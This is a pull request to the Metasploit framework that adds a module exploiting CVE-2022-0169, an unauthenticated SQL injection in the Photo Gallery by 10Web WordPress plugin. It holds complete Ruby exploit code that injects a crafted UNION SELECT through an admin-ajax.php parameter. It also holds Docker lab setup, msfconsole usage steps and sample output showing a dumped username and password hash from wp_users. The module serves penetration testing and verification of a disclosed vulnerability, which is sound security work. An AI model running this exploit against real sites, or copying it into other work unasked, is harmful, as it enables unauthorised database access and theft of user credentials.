### PR TITLE
WP Photo Gallery by 10Web Unauthenticated SQLi (CVE-2022-0169)

### DIFF
--- a/documentation/modules/auxiliary/gather/wp_photo_gallery_sqli.md
+++ b/documentation/modules/auxiliary/gather/wp_photo_gallery_sqli.md
@@ -1,0 +1,137 @@
+## Vulnerable Application
+
+The vulnerability affects the **Photo Gallery by 10Web** plugin for WordPress, versions **up to 1.6.0**,
+allowing **unauthenticated SQL injection** via the `bwg_tag_id_bwg_thumbnails_0[]` parameter
+on `admin-ajax.php` (action=`bwg_frontend_data`). WordPress itself must be installed.
+
+### Pre-requisites
+
+* **Docker** and **Docker Compose** installed.
+
+
+## Setup Instructions
+
+1. **Create a `docker-compose.yml`** with:
+
+```yaml
+version: '3.1'
+
+   services:
+     wordpress:
+       image: wordpress:latest
+       restart: always
+       ports:
+         - 5555:80
+       environment:
+         WORDPRESS_DB_HOST: db
+         WORDPRESS_DB_USER: chocapikk
+         WORDPRESS_DB_PASSWORD: dummy_password
+         WORDPRESS_DB_NAME: exploit_market
+       mem_limit: 512m
+       volumes:
+         - wordpress:/var/www/html
+
+     db:
+       image: mysql:5.7
+       restart: always
+       environment:
+         MYSQL_DATABASE: exploit_market
+         MYSQL_USER: chocapikk
+         MYSQL_PASSWORD: dummy_password
+         MYSQL_RANDOM_ROOT_PASSWORD: '1'
+       volumes:
+         - db:/var/lib/mysql
+
+   volumes:
+     wordpress:
+     db:
+```
+
+2. **Start the environment**
+
+```bash
+docker-compose up -d
+```
+
+3. **Install Photo Gallery plugin**
+
+```bash
+wget https://downloads.wordpress.org/plugin/photo-gallery.1.5.82.zip
+unzip photo-gallery.1.5.82.zip
+docker cp photo-gallery wordpress:/var/www/html/wp-content/plugins/
+```
+
+4. **Activate Photo Gallery**
+
+* Browse to `http://localhost:5555/wp-admin`, log in as admin (create one if needed), and activate **Photo Gallery by 10Web**.
+* Create a gallery.
+
+
+## Verification Steps
+
+1. **Launch Metasploit**
+
+```bash
+msfconsole
+```
+
+2. **Load the Photo Gallery SQLi scanner**
+
+```bash
+use auxiliary/gather/wp_photo_gallery_sqli
+set RHOSTS 127.0.0.1
+set RPORT 5555
+set TARGETURI /
+```
+
+3. **Run the module**
+
+```bash
+run
+```
+
+4. **Observe output**
+
+The module should:
+
+* Retrieve the database name
+* Enumerate tables and infer the `wp_users` table
+* Extract `user_login:user_pass` for the number of rows set by `COUNT`
+
+## Options
+
+### COUNT
+
+Number of user rows to retrieve (default: 5)
+
+## Scenarios
+
+```bash
+msf6 auxiliary(gather/wp_photo_gallery_sqli) > run http://lab:5555
+[*] Running module against 127.0.0.1
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] {SQLi} Executing (select 'nI5hKye')
+[*] {SQLi} Encoded to (select 0x6e4935684b7965)
+[+] The target is vulnerable.
+[*] {SQLi} Executing (SELECT 16 FROM information_schema.tables WHERE table_name = 'wp_users')
+[*] {SQLi} Encoded to (SELECT 16 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
+[*] {WPSQLi} Retrieved default table prefix: 'wp_'
+[*] {SQLi} Executing (select group_concat(sLt) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) sLt from wp_users limit 1) KVgXfyYs)
+[*] {SQLi} Encoded to (select group_concat(sLt) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0x7b,0)),ifnull(user_pass,repeat(0x14,0))) as binary) sLt from wp_users limit 1) KVgXfyYs)
+[!] No active DB -- Credential data will not be saved!
+[+] {WPSQLi} Credential for user 'chocapikk' created successfully.
+[*] {WPSQLi} Dumped user data:
+wp_users
+========
+
+    user_login  user_pass
+    ----------  ---------
+    chocapikk   $wp$2y$10$Lw9VAfqDMbi9md2Y0945TO4l0NTKJxxXTd3CDTr8gIkgDbBQ2mUgS
+
+[+] Loot saved to: /home/chocapikk/.msf4/loot/20250710131832_default_127.0.0.1_wordpress.users_427582.txt
+[*] {WPSQLi} Reporting host...
+[*] {WPSQLi} Reporting service...
+[*] {WPSQLi} Reporting vulnerability...
+[+] {WPSQLi} Reporting completed successfully.
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/gather/wp_photo_gallery_sqli.rb
+++ b/modules/auxiliary/gather/wp_photo_gallery_sqli.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     @sqli ||= get_sqli_object
-    fail_with(Failure::Unknown, GET_SQLI_OBJECT_FAILED_ERROR_MSG) if @sqli == GET_SQLI_OBJECT_FAILED_ERROR_MSG
+    fail_with(Failure::UnexpectedReply, GET_SQLI_OBJECT_FAILED_ERROR_MSG) if @sqli == GET_SQLI_OBJECT_FAILED_ERROR_MSG
 
     wordpress_sqli_initialize(@sqli)
     wordpress_sqli_get_users_credentials(datastore['COUNT'])

--- a/modules/auxiliary/gather/wp_photo_gallery_sqli.rb
+++ b/modules/auxiliary/gather/wp_photo_gallery_sqli.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Auxiliary
     create_sqli(dbms: MySQLi::Common, opts: { hex_encode_strings: true }) do |payload|
       expr = payload.to_s.gsub(/\s+/, ' ').strip
       cols = Array.new(23) { |i| i == 7 ? "(#{expr})" : rand(1000..9999).to_s }
-      injected = ")\" union select #{cols.join(',')} -- -g"
+      injected = ")\" union select #{cols.join(',')} -- -"
       endpoint = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
       params = {
         'action' => 'bwg_frontend_data',

--- a/modules/auxiliary/gather/wp_photo_gallery_sqli.rb
+++ b/modules/auxiliary/gather/wp_photo_gallery_sqli.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def get_sqli_object
     create_sqli(dbms: MySQLi::Common, opts: { hex_encode_strings: true }) do |payload|
-      expr = payload.to_s.strip.gsub(/\s+/, ' ')
+      expr = payload.to_s.gsub(/\s+/, ' ').strip
       cols = Array.new(23) { |i| i == 7 ? "(#{expr})" : rand(1000..9999).to_s }
       injected = ")\" union select #{cols.join(',')} -- -g"
       endpoint = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')

--- a/modules/auxiliary/gather/wp_photo_gallery_sqli.rb
+++ b/modules/auxiliary/gather/wp_photo_gallery_sqli.rb
@@ -1,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::Remote::HTTP::Wordpress::SQLi
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  GET_SQLI_OBJECT_FAILED_ERROR_MSG = 'Unable to successfully retrieve an SQLi object'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Photo Gallery Plugin SQL Injection (CVE-2022-0169)',
+        'Description' => %q{
+          The Photo Gallery by 10Web WordPress plugin <= 1.6.0 is vulnerable to
+          unauthenticated SQL injection via the 'bwg_tag_id_bwg_thumbnails_0[]'
+          parameter in admin-ajax.php (action=bwg_frontend_data).
+        },
+        'Author' => [
+          'Krzysztof Zając',    # Discovery
+          'Valentin Lobstein',  # Metasploit module
+          'X3RX3S'              # Help
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-0169'],
+          ['WPVDB', '0b4d870f-eab8-4544-91f8-9c5f0538709c'],
+          ['URL', 'https://github.com/X3RX3SSec/CVE-2022-0169']
+        ],
+        'Actions' => [['SQLi', { 'Description' => 'Perform SQL Injection via bwg_frontend_data' }]],
+        'DefaultAction' => 'SQLi',
+        'DefaultOptions' => {
+          'VERBOSE' => true,
+          'COUNT' => 5
+        },
+        'DisclosureDate' => '2022-03-14',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to WordPress', '/']),
+      Opt::RPORT(80)
+    ])
+  end
+
+  def get_sqli_object
+    create_sqli(dbms: MySQLi::Common, opts: { hex_encode_strings: true }) do |payload|
+      expr = payload.to_s.strip.gsub(/\s+/, ' ')
+      cols = Array.new(23) { |i| i == 7 ? "(#{expr})" : rand(1000..9999).to_s }
+      injected = ")\" union select #{cols.join(',')} -- -g"
+      endpoint = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+      params = {
+        'action' => 'bwg_frontend_data',
+        'shortcode_id' => '1',
+        'bwg_tag_id_bwg_thumbnails_0[]' => injected
+      }
+
+      res = send_request_cgi('method' => 'GET', 'uri' => endpoint, 'vars_get' => params)
+      return GET_SQLI_OBJECT_FAILED_ERROR_MSG unless res&.code == 200
+
+      node = res.get_html_document.at_css('div.bwg-title2')
+      node ? node.text : GET_SQLI_OBJECT_FAILED_ERROR_MSG
+    end
+  end
+
+  def check
+    @sqli = get_sqli_object
+    return Exploit::CheckCode::Unknown(GET_SQLI_OBJECT_FAILED_ERROR_MSG) if @sqli == GET_SQLI_OBJECT_FAILED_ERROR_MSG
+    return Exploit::CheckCode::Vulnerable if @sqli.test_vulnerable
+
+    Exploit::CheckCode::Safe
+  end
+
+  def run
+    @sqli ||= get_sqli_object
+    fail_with(Failure::Unknown, GET_SQLI_OBJECT_FAILED_ERROR_MSG) if @sqli == GET_SQLI_OBJECT_FAILED_ERROR_MSG
+
+    wordpress_sqli_initialize(@sqli)
+    wordpress_sqli_get_users_credentials(datastore['COUNT'])
+  end
+end


### PR DESCRIPTION
Hello Metasploit team,

This PR adds support for CVE-2022-0169, an unauthenticated SQL injection in the Photo Gallery by 10Web plugin (≤ 1.6.0). The vulnerability resides in the `bwg_frontend_data` AJAX action, specifically the `bwg_tag_id_bwg_thumbnails_0[]` parameter. By injecting a crafted UNION SELECT payload with 23 columns, placing our payload expression in the 8ᵉ column, we can extract `user_login: user_pass` hashes from the `wp_users` table. The module leverages `create_sqli` (MySQLi) and Metasploit's built-in `wordpress_sqli_get_users_credentials` to automate detection, exploitation, and credential dumping.

cc: @X3RX3SSec